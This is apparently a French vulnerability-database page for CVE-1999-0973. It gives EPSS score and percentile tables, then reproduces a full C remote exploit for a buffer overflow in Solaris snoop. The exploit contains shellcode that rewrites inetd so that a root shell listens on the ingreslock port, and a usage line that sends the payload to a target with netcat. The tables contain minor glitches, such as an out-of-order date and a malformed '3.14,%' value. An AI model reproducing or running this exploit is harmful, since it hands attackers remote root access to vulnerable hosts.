CVE-1999-0973 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	4.19%	–	–
2022-04-03	–	–	4.19%	–	–
2022-07-17	–	–	4.19%	–	–
2023-03-12	–	–	–	1.01%	–
2023-04-16	–	–	–	1.01%	–
2024-02-11	–	–	–	1.91%	–
2024-06-02	–	–	–	1.91%	–
2024-12-22	–	–	–	1.91%	–
2025-03-02	–	–	–	1.91%	–
2025-01-19	–	–	–	1.91%	–
2025-03-09	–	–	–	1.91%	–
2025-03-18	–	–	–	–	3.14%
2025-03-18	–	–	–	–	3.14,%

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Date	Percentile
2022-02-06	7%
2022-04-03	86%
2022-07-17	87%
2023-03-12	81%
2023-04-16	82%
2024-02-11	88%
2024-06-02	89%
2024-12-22	88%
2025-03-02	89%
2025-01-19	88%
2025-03-09	89%
2025-03-18	86%
2025-03-18	86%

// source: https://www.securityfocus.com/bid/858/info If a solaris machine is running snoop in verbose mode, it may be possible to compromise its security remotely by exploiting a buffer overflow in snoop. The problem is a buffer with a predefined length of 1024 that can be overflowed in the print_domain_name function. The priviliges granted to arbitrary code which could be executed would be those of the user running snoop, root. /* by: K2, version .2 this is a funny Solaris. remote Solaris 2.7 x86 snoop exploit rm /tmp/w0 yourself!&@$*(&$!*(@*$&()%RW run with ( ./snp ) | nc -u target_host_network 53 requires target host to be running "snoop" verified with patch 108483-01 thx str/horizon for shellcodes. Hi plageuz Hi mom. */ #include <unistd.h> #include <stdio.h> #include <stdlib.h> #include <string.h> char shell[] = "\xEB\x37\x5E\x8D\x5E\x10\x89\x1E\x83\xC3\x08\x89" "\x5E\x04\x83\xC3\x03\x89\x5E\x08\x83\xEB\x0B\x8D" "\x0E\x89\xCA\x33\xC0\x89\x46\x0C\x89\x46\xF5\x89" "\x46\xFA\x88\x46\x17\x88\x46\x1A\xB0\x3B\x52\x51" "\x53\x50\x9A\x73\x74\x72\x6E\x07\x72\xE8\xC4\xFF" "\xFF\xFF\x31\x33\x20\x4A\x61\x6E\x20\x31\x39\x39" "\x38\x2D\x2D\x73\x74\x72\x2F\x62\x69\x6E\x2F\x73" "\x68\x28\x2D\x63\x29 echo w00w00;echo \"ingreslock" "stream tcp nowait root /bin/sh sh -i\" >>/tmp/w0;" "/usr/sbin/inetd -s /tmp/w0;/bin/rm -f /tmp/w0"; #define SIZE 2048 #define NOPDEF 349 #define DEFOFF 0 const char x86_nop=0x90; long nop=NOPDEF,esp=0x804646c; long offset=DEFOFF; char buffer[SIZE]; int main (int argc, char *argv[]) { int i; if (argc > 1) offset += strtol(argv[1], NULL, 0); if (argc > 2) nop += strtoul(argv[2], NULL, 0); memset(buffer, x86_nop, SIZE); memcpy(buffer+nop, shell, strlen(shell)); for (i = nop+strlen(shell); i < SIZE-4; i += 4) { *((int *) &buffer[i]) = esp+offset; } fprintf(stderr,"0x%x\n",esp+offset); printf("%s", buffer); return 0; }